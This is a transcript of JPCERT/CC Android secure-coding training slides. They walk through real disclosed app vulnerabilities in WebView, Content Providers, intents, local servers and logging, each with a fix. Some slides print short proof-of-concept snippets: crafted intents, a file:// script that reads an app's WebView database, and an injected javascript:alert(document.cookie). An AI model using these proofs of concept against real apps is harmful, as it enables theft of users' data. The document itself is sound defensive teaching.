android secure coding
Post on 11-Nov-2014
258 Views
Preview:
DESCRIPTION
TRANSCRIPT
Android Secure Coding Sept 10th: Delhi Sept 12th: Bangalore
Hiroshi Kumagai & Masaki Kubo Vulnerability Analysis Team JPCERT Coordination Center
Copyright©2014 JPCERT/CC All rights reserved.
Instructors
Hiroshi Kumagai Lead Analysit hiroshi.kumagai@jpcert.or.jp After the years of experience in developing web application/systems, Android apps, designing websites, Hiroshi joined JPCERT in 2011. Since then, he has been analyzing vulnerabilities, developing analysis tools, writing articles about secure coding for Webzines.
Masaki Kubo Vulnerability Analysis Team Lead masaki.kubo@jpcert.or.jp Masaki is leading the vulnerability analysis team at JPCERT. Prior to join JPCERT, he developed software at SONY. Since 2006, he is leading secure coding initiative and has taught over 4000 programmers in Japan and Asia-Pacific regions. He is an expert of ISO/IEC SC27 WG4 and visiting lecturer at National Institute of Informatics.
3
Copyright©2014 JPCERT/CC All rights reserved.
Timetable
4
09:30 – 10:00 Part 1. Introduction 10:00 – 11:30 Part 2. Android Secure Coding Techniques 11:30 – 11:45 Tea Break 11:45 – 14:45 Part 3. Exercise Vulnerability 12:45 – 13:30 Lunch Break 13:30 – 14:30 Part 3 (cont.) 14:30 – 15:30 Part 4. Security Code Review 15:30 – 15:45 Tea Break
15:45 – 17:00 Part 4 (cont.) 17:00 – 17:15 Feedbak, Closing Remarks and FIN.
Copyright©2014 JPCERT/CC All rights reserved.
Goals of the Training
Understand the real-world threats to Android application and secure coding techniques to mitigate them Be able to apply the working knowledge to the security assessment and secure development of Android application
5
Copyright©2014 JPCERT/CC All rights reserved.
What We Do at JPCERT/CC
Conduct root cause analysis on privately reported vulnerabilities —Reproduction, Reverse
Engineering, Source Code Analysis, Design Review etc.
Talk to vendors to ask for a fix Training developers in C/C++/Java/Android Secure Coding
6
Root Cause Analysis
• Defining the problem • What is the
vulnerability? • Data/Evidence Collection
and Verification • Reproducing the
vulnerability • Pinpoint the root cause • Counter measures
Copyright©2014 JPCERT/CC All rights reserved.
Introduction Part 1
7
Copyright©2014 JPCERT/CC All rights reserved.
Android Users Grows in 2014
8
[Source] The Guardian (January 13, 2014) “Smartphone explosion in 2014 will see ownership in India pass US”
Copyright©2014 JPCERT/CC All rights reserved.
Android Security on News Headlines
9
http://www.pcmag.com/article2/0,2817,2464103,00.asp http://www.zdnet.com/68-percent-of-top-free-android-apps-vulnerable-to-cyberattack-researchers-claim-7000032875/
Copyright©2014 JPCERT/CC All rights reserved.
Android Security on News Headlines
10
http://www.pcworld.com/article/2099421/report-malwareinfected-android-apps-spike-in-the-google-play-store.html http://www.cnet.com/how-to/malware-authors-target-android-phones/
Copyright©2014 JPCERT/CC All rights reserved.
Categories of Android App Security Issues
11
Viruses (Malicious Apps)
Potentially Unwanted
Apps
Vulnerable Apps
Androidアプリ脆弱性調査レポート 2013年10月版 http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
Copyright©2014 JPCERT/CC All rights reserved.
Categories of Android App Security Issues
12
Viruses (Malicious Apps)
Potentially Unwanted
Apps Vulnerable
Apps
Not so much to do with App developers
Yes, this is our concern. The responsibility is on App developers
Copyright©2014 JPCERT/CC All rights reserved.
Category Potential Impact Countermeasures
Distribute virus-infected apps to end users
Scan apps with Anti-Virus before releasing them
Distribute annoying apps to end users, bringing bad corporate reputation
Change the design so that it will not collect user’s sensitive info unnecessarily. Prepare and publish privacy policy of the app.
End users’ privacy get compromised. Damages corporation reputation as well.
App developers need to design apps secure and code securely.
Challenging, not easily acoomplished
Easily Mitigated
Impact and Countermeasures
13
Virus (Malicious Apps)
Potentially Unwanted
Apps
Vulnerable Apps
Copyright©2014 JPCERT/CC All rights reserved.
Secure Android App Development
14
Scan with Anti-Virus before releasing apps
Design not to annoy end users
We’ll look at it in detail later ..
Virus (Malicious Apps)
Potentially Unwanted
Apps
Vulnerable Apps
Copyright©2014 JPCERT/CC All rights reserved.
# of Android App Vulnerabilities Reported in Japan
15
http://www.ipa.go.jp/security/vuln/report/JVNiPedia2012q3.html
The year of Vulnerable App Explosion of private report in 2012
Apps
#
The number of Android OS software vulnerability reported by the year
Copyright©2014 JPCERT/CC All rights reserved.
Survey of Android Application Vulnerability
16
Survey of Vulnerabilities in Android Apps 2013 http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
96% of the Apps in the market are vulnerable
Vulnerability is not properly controlled
in Android Apps Vulnerable
Almost all the android apps contain some vulnerability
Copyright©2014 JPCERT/CC All rights reserved.
Developers make the same easy mistakes
Same easy mistakes are repeated —File permissions —Logging —Exported settings
All the app developer should have: —Android specific security
model —Secure coding best
pracitce
17
http://www.ipa.go.jp/about/technicalwatch/pdf/120613report.pdf
component
file
Improper Access Control others
Copyright©2014 JPCERT/CC All rights reserved.
# of Android App Vuln. JPCERT Coordinated
18
Etc.
Advisories Published: 50 Apps
Under Coordination: 200 Apps
For most of the cases, developers have been cooperative and responsive.
Copyright©2014 JPCERT/CC All rights reserved.
Categories of Android App Vulnerability
19
App Component Exposure
1. Unintended Activity Exposure
2. Local Server Accessible from Other Apps
3. Unintended Content Provider Exposure
WebView 4. File scheme
5. addJavascriptInterface
6. Address Bar Spoofing
7. JavaScript execution context
Casual Info Disclosure 8. Broadcasting sensitive information
9. Loging sensitive information
10. Storing sensitive data in SD card
11. Improper File Permissions
HTML 5 12. Geolocation API and Privacy Concern
‘Classic’ Vulnerability 13. Cryptographic Issues
14. Path traversal
15. Unsafe Decompression of Zip Files
16. Improper Certificate Verification
Copyright©2014 JPCERT/CC All rights reserved.
‘Bugs’ and ‘Vulnerabilities’
20
Bug Vulnerability
Specification Implementation
Whittaker and Thompson, 2003
How we want the software to behave (programmer’s intent)
How software actually behaves
Secure software does what it is supposed to do and doesn’t do what is not expected to do.
Copyright©2014 JPCERT/CC All rights reserved.
What is Secure Coding? (Wikipedia)
“Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.”
21
Copyright©2014 JPCERT/CC All rights reserved.
Android App Vulnerabilities
In Part 2, we will look at each real world
vulnerabilities to discuss:
Nature of the vulnerability Root cause How to address the vulnerability References
22
Copyright©2014 JPCERT/CC All rights reserved.
Android Security Discussions G+ community
23
Great place to catch up with the latest discussion about any security issues on Android.
https://plus.google.com/communities/118124907618051049043
Copyright©2014 JPCERT/CC All rights reserved.
Reference for a Developer
Android Application Secure Design / Secure Coding Guidebook by JSSEC —http://www.jssec.org/dl/android_securecoding_en_20140701.pdf
24
Reference secure implementation in the guidebook can be copied & pasted for commercial use under Apache License version 2.0.
Copyright©2014 JPCERT/CC All rights reserved.
Other Resources
Understanding Android’s Security Framework —Not a recent resource but still gives a good intro. into
Android specific security model —http://siis.cse.psu.edu/slides/android-sec-tutorial.pdf
Secure Mobile Development Best Practices —https://viaforensics.com/resources/reports/best-practices-ios-
android-secure-mobile-development/ Reverse Engineering, Pentesting and Hardening of Android Apps —https://speakerdeck.com/viaforensics/droidcon2014
25
Copyright©2014 JPCERT/CC All rights reserved.
Unintended Activity Exposure CASE #1
26
Copyright©2014 JPCERT/CC All rights reserved.
3rd Party Twitter Client Improper Access Control to its Components
27
Allows other application with no network access permissions to upload pictures
3rd party Twitter client for Android with picture uploading capability
Malicious app could impersonate the user to tweet
https://play.google.com/store/apps/details?id=jp.r246.twicca http://jvn.jp/en/jp/JVN31860555/
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenario – Information Disclosure
28
malware
1. Malware generates URL for picture in local storage (file://...)
2. Malware passes the URL to the picture-uploading activity
3. The activity tweets with the picture
Info. disclosure
Personal information tweeted to the public file://sdcard/…/PrivatePhoto.jpg
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenario – impersonation
29
malware
1. Malware generates URL for malicious picture (file://...)
2. Malware passes the URL to the picture-uploading activity
3. The activity tweets with the picture
Malicious picture tweeted from the user’s twitter account
file://mal/malpic.jpg
impersonation
悪
悪 悪
悪
Copyright©2014 JPCERT/CC All rights reserved.
The cause of the vulnerability
30
malware
Sending intents to the activity
Intent
• Picture-uploading activity was intended to be used internally • But the activity was exported (accessible from other apps)! • Other apps could send intents (request actions) to this activity
Activity was exported
Copyright©2014 JPCERT/CC All rights reserved.
Solution
31
malware
Explicitly declare the activity as private by (android:exported=“false”)
Declared as a private activity
... <activity android:name=".PicUploadActivity" ... android:exported="false" /> ...
AndroidManifest.xml
Copyright©2014 JPCERT/CC All rights reserved.
Refer to the JSSEC Secure Coding Guidebook
32
4.1.1.1. Creating/Using Private Activities Private: designed to be used inside the app only
android:exported="false"
sample manifest file
sample secure java code
Copyright©2014 JPCERT/CC All rights reserved.
How the app was fixed
33
… public void onCreate(Bundle arg5) { super.onCreate(arg5); ... ComponentName v0 = this.getCallingActivity(); if (v0 == null) { this.finish(); } else if (!“jp.r246.twicca”.equals(v0.getPackageName())) { this.finish(); } else { // code for uploading pictures … } }
The added code checks if the package name of the calling code is the same as its own package name.
this check was added
The more appropriate fix is “exported = false”.
Copyright©2014 JPCERT/CC All rights reserved.
Local Server Accessible from Other Apps
CASE #2
34
Copyright©2014 JPCERT/CC All rights reserved.
Case
ES File Explorer File Manager Feature — File and application manager
Problem —can obtain the files in the external media
35
https://play.google.com/store/apps/details?id=com.estrongs.android.pop
Copyright©2014 JPCERT/CC All rights reserved.
HTTP Server is started
When you play music files or videos in this app, its own HTTP Server is launched in device
36
Copyright©2014 JPCERT/CC All rights reserved.
Unrestricted access
The HTTP Server allowed unrestricted access By accessing the HTTP Server from the WAN, a list of files on the external media can be seen —You can download those files
37
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenarios
Conditions —Could be attacked only when the media files are being
played Scenarios —To induce the user to play media files —Attacker obtains the IP address of the device in some way —Access to the IP address
38
can be difficult to attack
Copyright©2014 JPCERT/CC All rights reserved.
Solution
Limit the accessibility to local server —user authentication
Use ID and Password —IP address restrictions
Make it inaccessible from the WAN
Consider —Other apps may be using local server ? —Whether there is a need to launch a local server ?
39
Copyright©2014 JPCERT/CC All rights reserved.
Unintended Content Provider Exposure
CASE #3
40
Copyright©2014 JPCERT/CC All rights reserved.
Content Provider
mechanism to share data between applications makes it easy to implement reading/writing data —don't need to worry about locking/exclusive access control
41
Copyright©2014 JPCERT/CC All rights reserved.
Case
Vulnerable app (has not been fixed yet)
Feature —A day planner app for Android. The integration of the TODO
and Note memos allows linkage of the scheduled plan with its corresponding information.
Problem —The Content Provider was made public. Other apps could
access the application data via Content Provider of this app.
42
https://play.google.com/store/apps/details?id=jp.co.xxxxxx.android.xxxxxxx
Copyright©2014 JPCERT/CC All rights reserved.
Assumption of the developer
To share data between other apps.
43
App A
This vuln app
ContentProvider
READ/WRITE data
App B
Copyright©2014 JPCERT/CC All rights reserved.
in fact
Malicious apps can retrieve/manipulate data on the Content Provider
44
Malicious apps retrieve/manipulate
This vuln app
ContentProvider
READ/WRITE data
Copyright©2014 JPCERT/CC All rights reserved.
in fact
Any other apps (including malicious apps)
could retrieve/manipulate data on Content Provider.
45
Malicious apps
This vuln app
ContentProvider
READ/WRITE data
App A
App B
retrieve/manipulate
Copyright©2014 JPCERT/CC All rights reserved.
Data Access/Manipulation
What an attacker can do ? Note memos, photos, TODO, Voice memos —retrieve/manipulate
46
final String CONTENT_URI = "content://jp.co.XXXX.XXXXXX.XXXXXXX.XXXXXX"; ContentValues values = new ContentValues(); values.put("filename", "/data/data/jp.co.XXXX.XXXXXX.XXXXXXX.XXXXXX/databases/xxx"); values.put("titlename", "hogehoge"); getContentResolver().insert(Uri.parse(CONTENT_URI + "/textmemo"), values);
for example:
Copyright©2014 JPCERT/CC All rights reserved.
To share data
Point to consider in the implementaion
Range of other apps that you want to share data with —unspecified large number of apps —Limit the access to app that has the same signature —Limit the access to app that has a specific permission
Contents of the data —Any concerns to be shared within other apps?
What do you want to achieve through sharing —Only allow retrieving the shared data? —Or allow them to add, edit or delete as well?
47
Copyright©2014 JPCERT/CC All rights reserved.
To share data #1
Unspecified large number of apps
A Content Provider is made public to other apps —From Android 4.2(API17) or later, a Content Provider is
private if you do not specify the attribute explicitly. need to set android:minSdkVersion and android:targetSdkVersion to 17 or later
48
<provider android:name="SampleContentProvider" android:authorities=“com.example.app.Provider” android:exported="true" />
AndroidManifest.xml
Copyright©2014 JPCERT/CC All rights reserved.
To share data #2
Limit the access to app that has the same signature
49
<provider android:name="SampleContentProvider" android:authorities="com.example.app.Provider" android:permission="com.example.app.permission.Provider" /> <permission android:protectionLevel="signature" android:name="com.example.app.permission.Provider"> </permission>
AndroidManifest.xml
Copyright©2014 JPCERT/CC All rights reserved.
To share data #3
Limit the access to app that has a specific permission
50
<provider android:name=“RssContentProvider" android:authorities="com.example.app.Provider" android:permission="com.example.app.permission.Provider" /> <permission android:name="com.example.app.permission.Provider" />
AndroidManifest.xml
Copyright©2014 JPCERT/CC All rights reserved.
Do not want to share data
Point to consider in the implementation
Is it really necessary to use a Content Provider? —If not, do not use Content Provider
Make Content Provider private —by specifying "android:exported=false" attribute in the
AndroidManifest.xml
51
Copyright©2014 JPCERT/CC All rights reserved.
Do not want to share data #1
Do not use Content Provider
Connected directly to the database —Use SQLiteDatabase class or SQLiteOpenHelper class
Can NOT connect to the database from other apps
52
SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase( new File( "/data/data/" + getContext().getPackageName() + "/databases/", DATABASE), null); long id = db.insert("items", null, values); db.close();
Copyright©2014 JPCERT/CC All rights reserved.
Do not want to share data #2
Make Content Provider private
by specifying "android:exported" attribute in the AndroidManifest.xml —However, in Android 2.2(API8) or before, even if you
explicitly declare "android:exported=false", your Content Provider is accessible from other apps.
53
<provider android:name="SampleContentProvider" android:authorities=“com.example.app.Provider” android:exported="false" />
Copyright©2014 JPCERT/CC All rights reserved.
Refer to the JSSEC Secure Coding Guidebook
54
The risks and countermeasures of using Content Provider are described
Copyright©2014 JPCERT/CC All rights reserved.
Summary
Is there a need to use Content Provider ?
Content Provider is an API for sharing data basically —If you don’t need to share data between apps
DO NOT USE Content Provider Connect directly to the database
—If you need to share data between apps Do not include sensitive information Limit the apps that can connect to the Content Provider
55
Copyright©2014 JPCERT/CC All rights reserved. 56
WebView
4. File Scheme
5. addJavascriptInterface
6. Address Bar Spoofing
7. JavaScript Execution Context
Copyright©2014 JPCERT/CC All rights reserved.
File Scheme
CASE #4
57
Copyright©2014 JPCERT/CC All rights reserved.
Case
Yahoo! Japan Browser / Sleipnir Mobile Feature —Web Browser apps
Problem —WebView with JavaScript enabled —WebView processes any URI passed through Intents without
any validation
58
Copyright©2014 JPCERT/CC All rights reserved.
Vulnerable code public class MyBrowser extends Activity { @override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); WebView webView = (WebView) findViewById(R.id.webview); // turn on javascript WebSettings settings = webView.getSettings(); settings.setJavaScriptEnabled(true); String turl = getIntent().getStringExtra(“URL”); webView.loadUrl(turl); } }
59
Activity received an Intent that contains malicious data
processes any URI
Copyright©2014 JPCERT/CC All rights reserved.
Activity that implements the WebView
60
アプリB Intent URL
This Vulnerability is often seen in the apps that
implement the WebView
App A
DB ・cookie ・cache
WebView Activity public
・enabled Javascript ・any URI passed
Copyright©2014 JPCERT/CC All rights reserved.
Attack scenarios
61
Vuln app
DB ・cookie ・cache
WebView Activity public
・enabled Javascript ・any URI passed
cookie
cache
Malicious app
Intent
Attacker prepares some crafted HTML file
Attacker's Server
Copyright©2014 JPCERT/CC All rights reserved.
Malicious app send an Intent
62
Vuln app
DB ・cookie ・cache
WebView Activity public
・enabled Javascript ・any URI passed
cookie
cache Attacker supplied HTML/Javascript
Attacker's Server
Malicious app
Intent
String pkg = "jp.vulnerable.android.app"; String cls = pkg + ".DummyLauncherActivity"; String uri = "file:///[Exploit html file]"; Intent intent = new Intent(); intent.setClassName(pkg, cls); intent.putExtra("url", uri); this.startActivity(intent);
Copyright©2014 JPCERT/CC All rights reserved.
Malicious app send an Intent
63
Vuln app
DB ・cookie ・cache
WebView Activity public
・enabled Javascript ・any URI passed
cookie
cache Attacker supplied HTML/Javascript
Attacker's Server
Malicious app
Intent
String pkg = "jp.vulnerable.android.app"; String cls = pkg + ".DummyLauncherActivity"; String uri = "file:///[Exploit html file]"; Intent intent = new Intent(); intent.setClassName(pkg, cls); intent.putExtra("url", uri); this.startActivity(intent);
… String turl = getIntent().getStringExtra("url"); webView.loadUrl(turl);
Copyright©2014 JPCERT/CC All rights reserved.
Open an exploit html file
64
Vuln app
DB ・cookie ・cache
WebView Activity public
・enabled Javascript ・any URI passed
cookie
cache
Attacker's Server
Malicious app
Intent
… String turl = getIntent().getStringExtra("url"); webView.loadUrl(turl);
Attacker prepares some crafted HTML file
Copyright©2014 JPCERT/CC All rights reserved.
Open an exploit html file
65
Vuln app
DB ・cookie ・cache
WebView Activity public
・enabled Javascript ・any URI passed
cookie
cache
Attacker's Server
Malicious app
Intent
Attacker prepares some crafted HTML file
<script> var target = "file:///data/data/jp.vulnerable.android.app/databases/webview.db"; var xhr = new XMLHttpRequest(); xhr.overrideMimeType("text/plain; charset=iso-8859-1"); xhr.open("GET", target, true); xhr.onreadystatechange = function() { var data = xhr.responseText; ...
It can be abused to access the vuln app's resources
Copyright©2014 JPCERT/CC All rights reserved.
Conditions of the Vulnerable App
WebView is implemented and JavaScript is enabled Activity is public, and can receive any URI from Intent file scheme is enabled
66
Information managed by the vulnerable apps may be disclosed
Copyright©2014 JPCERT/CC All rights reserved.
Solution
To validate the URI that was received in Intent —do not receive a URI of the file scheme —do not display the page, disable Javascript
67
String intentUrl = getIntent().getStringExtra(”url")
String loadUrl = "about:blank";
if (!intentUrl.startsWith("file:")) {
loadUrl = intentUrl;
}
Do not display the pages
String intentUrl = getIntent().getStringExtra(”url”)
wSettings.setJavaScriptEnabled(false);
if (!intentUrl.startsWith("file:")) {
wSettings.setJavaScriptEnabled(true);
}
Disabled Javascript
Copyright©2014 JPCERT/CC All rights reserved.
Android 4.1 or later
68
Several new methods have been added —WebSettings#setAllowFileAccessFromFileURLs —WebSettings#setAllowUniversalAccessFromFileURLs
http://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccessFromFileURLs(boolean)
Copyright©2014 JPCERT/CC All rights reserved.
Refer to the JSSEC Secure Coding Guidebook
69
Be careful when receiving URIs
Copyright©2014 JPCERT/CC All rights reserved.
addJavascriptInterface
CASE #5
70
Copyright©2014 JPCERT/CC All rights reserved.
Case
Cybozu KUNAI http://products.cybozu.co.jp/kunai/ Feature —App for accessing a groupware
Problem —Contained a vulnerability that allows addJavascriptInterface to be exploited —When opening a specially crafted website, an attacker could execute an arbitrary Java method
71
Copyright©2014 JPCERT/CC All rights reserved.
addJavascriptInterface
WebView#addJavascriptInterface —Binds the supplied Java object into the WebView —Allows the Java object's methods to be accessed from
Javascript
72
http://developer.android.com/reference/android/webkit/WebView.html
webView.addJavascriptInterface(new Object(), "injectedObject"); webView.loadData("", "text/html", null); webView.loadUrl("javascript:alert(injectedObject.toString())");
can be called by the name of “injectedObject”
Copyright©2014 JPCERT/CC All rights reserved.
Notes on addJavascriptInterface
Allows an app to be manipulated through Javascript Should not process untrusted content Should only process trusted content!
73
http://developer.android.com/guide/webapps/webview.html
Copyright©2014 JPCERT/CC All rights reserved.
Example: Access to the Java method from Javascript
74
@Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.demo); context = this.getApplicationContext(); webView = (WebView) findViewById(R.id.demoWebView); webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new SmsJSInterface(this), "smsJSInterface"); GetSomeInfo getInfo = new GetSomeInfo(); getInfo.execute(null, null); } <script> smsJSInterface.sendSMS('0123456789', 'hogehoge'); </script>
public class SmsJSInterface implements Cloneable { Context mContext; public SmsJSInterface(Context context) { mContext = context; } public void sendSMS(String phoneNumber, String message) { SmsManager sms = SmsManager.getDefault(); sms.sendTextMessage(phoneNumber, null, message, null, null); }
Copyright©2014 JPCERT/CC All rights reserved.
Example: Access to the Java method from Javascript
75
@Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.demo); context = this.getApplicationContext(); webView = (WebView) findViewById(R.id.demoWebView); webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new SmsJSInterface(this), "smsJSInterface"); GetSomeInfo getInfo = new GetSomeInfo(); getInfo.execute(null, null); } <script> smsJSInterface.sendSMS('0123456789', 'hogehoge'); </script>
public class SmsJSInterface implements Cloneable { Context mContext; public SmsJSInterface(Context context) { mContext = context; } public void sendSMS(String phoneNumber, String message) { SmsManager sms = SmsManager.getDefault(); sms.sendTextMessage(phoneNumber, null, message, null, null); }
Bind the SmsJSInterface object to WebView
access from Javascript
send to SMS
Copyright©2014 JPCERT/CC All rights reserved.
Conditions of vulnerable apps
WebView is implemented and Javascript is enabled Registers Java objects in addJavascriptInterface It is possible that Javascript is passed from other apps
76
Dangerous because it allows an unexpected control by an attacker
Copyright©2014 JPCERT/CC All rights reserved.
Reference: risk of addJavascriptInterface
77
Risk of addJavascriptInterface by using reflection —Runtime.exec()
MWR InfoSecurity WebView addJavascriptInterface Remote Code Execution
https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
Copyright©2014 JPCERT/CC All rights reserved.
Summary
78
Design that dose not use the addJavascriptInterface If you need to use… —Use only trusted content
DO NOT USE WebView#addJavascriptInterface
Copyright©2014 JPCERT/CC All rights reserved.
Android 4.2(API17) or later
79
class JsObject { @JavascriptInterface public String toString() { return "injectedObject"; } } webView.addJavascriptInterface(new JsObject(), "injectedObject"); webView.loadData("", "text/html", null); webView.loadUrl("javascript:alert(injectedObject.toString())");
only public methods that are annotated with "JavascriptInterface" can be accessed from Javascript
http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
Copyright©2014 JPCERT/CC All rights reserved.
Refer to the JSSEC Secure Coding Guidebook
80
Summary of Notes on the use of WebView
Copyright©2014 JPCERT/CC All rights reserved.
Address Bar Spoofing CASE #6
81
Copyright©2014 JPCERT/CC All rights reserved.
An attacker may display a different URL than that of page contents
https://play.google.com/store/apps/details?id=jp.co.yahoo.android.ybrowser https://jvn.jp/en/jp/JVN55074201/
Could be abused for phishing…
Address Bar Spoofing Vulnerability in Android Web Browsers
82
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenario – Phishing -
83
“Yahoo! Browser” contains a flaw in displaying URL, which allows the address bar to be spoofed.
A user access a malicious page on www.example.jp
User
The server responds with the requested contents
The address bar shows a URL which is different from the site being accessed
Copyright©2014 JPCERT/CC All rights reserved.
How the Flaw Could Be Exploited
84
“Yahoo! Browser” contains a flaw in displaying URL, which allows the address bar to be spoofed.
A user access a malicious page on www.example.jp
User
The server responds with the requested contents
The addressbar shows a URL which is different from the site being accessed
<script> function spoof(){ var w = window.open(the URL to spoof) w.document.write(some contents) } </script>
Copyright©2014 JPCERT/CC All rights reserved.
The behavior of the Vulnerable App
85
Attack Scenario – Phishing - “Yahoo! Browser” contains an issue in displaying URL, which may result in the address bar being spoofed.
A user access a malicious page on www.example.jp
User
responds with the requested contents
The addressbar shows some URL different from the actual contents
<script> function spoof(){ var w = window.open(URL of Trusted Site) w.document.write(actual contents) } </script>
<script> function spoof(){ var w = window.open(the URL to spoof) w.document.write(some contents) } </script>
how it processed the javascript? (our assumption)
•Opens a new browser window •Display the URL on the address bar
•Terminates the loading of URL •Writes ‘some contents’ to the window
But doesn’t update the address bar of the window?
Copyright©2014 JPCERT/CC All rights reserved.
What is the Root Cause?
86
Address Bar showing a URL
The two components failed to synchronize each other
Browser window showing page contents
Should show the origin of the page content as URL
Should show the contents of the URL
Copyright©2014 JPCERT/CC All rights reserved.
Solution?
87
Browsers behaves differently: a. Shows incorrect URL b. Address bar is left blank c. document.write() is ignored
Which is the preferable behavior? Any alternatives?
Copyright©2014 JPCERT/CC All rights reserved.
Solution?
88
Browsers behaves differently: a. Shows incorrect URL b. Address bar is left blank c. document.write() is ignored
Which is the preferable behavior? Any alternatives?
Pro: Better than a. to avoid confusing the contents and the URL Con: user can’t determine where the contents came from
Copyright©2014 JPCERT/CC All rights reserved.
Solution?
89
Browsers behaves differently: a. Shows incorrect URL b. Address bar is left blank c. document.write() is ignored
Which is the preferable behavior? Any alternatives?
Pro: Better than a. to avoid confusing the contents and the URL Con: the behavior may be different than what the developer intends
Copyright©2014 JPCERT/CC All rights reserved.
Javascript Execution Context
CASE #7
90
Copyright©2014 JPCERT/CC All rights reserved.
Case
Opera, Sleipnir Feature —Web browser apps
Problem —Javascript is executed in
the context of the target site
91
Copyright©2014 JPCERT/CC All rights reserved.
Attack scenarios
An attacker sends multiple Intents 1. First send an Intent to display the target site 2. Then send a Javascript that you want to execute as another
Intent
for example 1. Send an Intent for displaying www.google.com 2. Send another Intent to display a cookie by using Javascript
using Javascript Scheme —javascript:alert(document.cookie)
92
Copyright©2014 JPCERT/CC All rights reserved.
PoC
93
String pkg = "jp.co.fenrir.android.sleipnir"; String cls = pkg + ".main.IntentActivity"; Intent intent1 = new Intent(); intent1.setClassName(pkg, cls); intent1.setAction("android.intent.action.VIEW"); intent1.setData(Uri.parse("http://www.google.com")); startActivity(intent1); try { Thread.sleep(3000); } catch (InterruptedException e) { e.printStackTrace(); } String js = "alert(document.cookie);"; Intent intent2 = new Intent(); intent2.setClassName(pkg, cls); intent2.setAction("android.intent.action.VIEW"); intent2.setData(Uri.parse(js)); startActivity(intent2);
Send the URL of the target
Send a URL that you want to be executed
Copyright©2014 JPCERT/CC All rights reserved.
PoC
94
String pkg = "jp.co.fenrir.android.sleipnir"; String cls = pkg + ".main.IntentActivity"; Intent intent1 = new Intent(); intent1.setClassName(pkg, cls); intent1.setAction("android.intent.action.VIEW"); intent1.setData(Uri.parse("http://www.google.com")); startActivity(intent1); try { Thread.sleep(3000); } catch (InterruptedException e) { e.printStackTrace(); } String js = "alert(document.cookie);"; Intent intent2 = new Intent(); intent2.setClassName(pkg, cls); intent2.setAction("android.intent.action.VIEW"); intent2.setData(Uri.parse(js)); startActivity(intent2);
Javascript is executed in the context of www.google.com
Copyright©2014 JPCERT/CC All rights reserved.
Solution
95
Verify if you received a URI in the Intent —Do not accept Javascript Scheme
The app has been fixed already —However, code is obfuscated —We couldn't confirm how it was fixed
Copyright©2014 JPCERT/CC All rights reserved.
Broadcasting Sensitive Information
CASE #8
96
Copyright©2014 JPCERT/CC All rights reserved.
Intent
Intent —A message object that is passed between components (such
as Activity, Service, Broadcast Receiver, Content Provider) —Explicit Intent
a package is specified —Implicit Intent
a package is not specified, there is a risk of information leakage
Intent.setPackage(packageName) —Limit package that can resolve the Intent —Available for Android 4.0(API14) or later
97
Copyright©2014 JPCERT/CC All rights reserved.
LINE for Android vulnerable in handling implicit intents
98
Handling implicit intents is inappropriate, information such as messages sent by LINE may be leaked
https://play.google.com/store/apps/details?id=jp.naver.line.androi http://jvn.jp/en/jp/JVN67435981/
LINE is an app for communication with others.
Copyright©2014 JPCERT/CC All rights reserved.
Attack Scenarios
99
User
2. The message is Broadcasted thus malicious app could read the message.
App
Malicious app
Message Information (Intent)
Information Disclosure
App
App
message
1. A user send a message (suppose a malicious app is already installed)
Malicious app
Broadcast receiver
Broadcast receiver
Copyright©2014 JPCERT/CC All rights reserved.
Solution
100
Malicious app
• use an explicit Intent if you only want to send to your internal Broadcast receiver
• limit the destination class
Limit the destination using an explicit Intent
Q. How to fix the flaw?
A. Use explicit Intent
Broadcast receiver
App Message Information
(Intent)
Broadcast receiver
Copyright©2014 JPCERT/CC All rights reserved.
Refer to the JSSEC Secure Coding Guidebook
101
Use the explicit Intent with class specified to call a receiver within the same application.
Copyright©2014 JPCERT/CC All rights reserved.
Broadcast within own app
use LocalBroadcastManager —You know that the data you are broadcasting won't leave
your app, so don't need to worry about leaking private data —It is not possible for other applications to send these
broadcasts to your app, so you don't need to worry about having security holes they can exploit
—It is more efficient than sending a global broadcast through the system
102
Intent intent = new Intent("my-sensitive-event"); intent.putExtra("event", "this is a test event"); LocalBroadcastManager.getInstance(this).sendBroadcast(intent);
Copyright©2014 JPCERT/CC All rights reserved.
When You Implement Broadcast Receiver
Limit the destination if you need to send sensitive information —Intent#setClass(Context, class)
If the app lacks a permission and an error occurs during the sending of the broadcast message, the error will also be sent to LogCat —The error message in LogCat could leak the contents of the
Intent
If you are publishing a Broadcast Receiver, consider the risk of Intents being sent from a malware
103
Copyright©2014 JPCERT/CC All rights reserved.
Logging Sensitive Information
CASE #9
104
Copyright©2014 JPCERT/CC All rights reserved.
Log Output
android.util.Log class —Log.d (Debug)/ Log.e (Error) —Log.i (Info) / Log.v (Verbose) / Log.w (Warn)
105
Log.v("method", Login.TAG + ", account=" + str1); Log.v("method", Login.TAG + ", password=" + str2);
example
Copyright©2014 JPCERT/CC All rights reserved.
Obtain Log Output
declare READ_LOGS permission in the AndroidManifest.xml —Apps can read log output
call logcat from an app
106
<uses-permission android:name="android.permission.READ_LOGS"/>
AndroidManifest.xml
Process mProc = Runtime.getRuntime().exec( new String[]{"logcat", "-d", "method:V *:S“}); BufferedReader mReader = new BufferedReader( new InputStreamReader(proc.getInputStream()));
example
Copyright©2014 JPCERT/CC All rights reserved.
Account information or other information such as sessionID are saved in a log file
http://jvn.jp/jp/JVN31860555/ http://madoka-magica-game.channel.or.jp/#/Application
Monaca account would have been hijacked
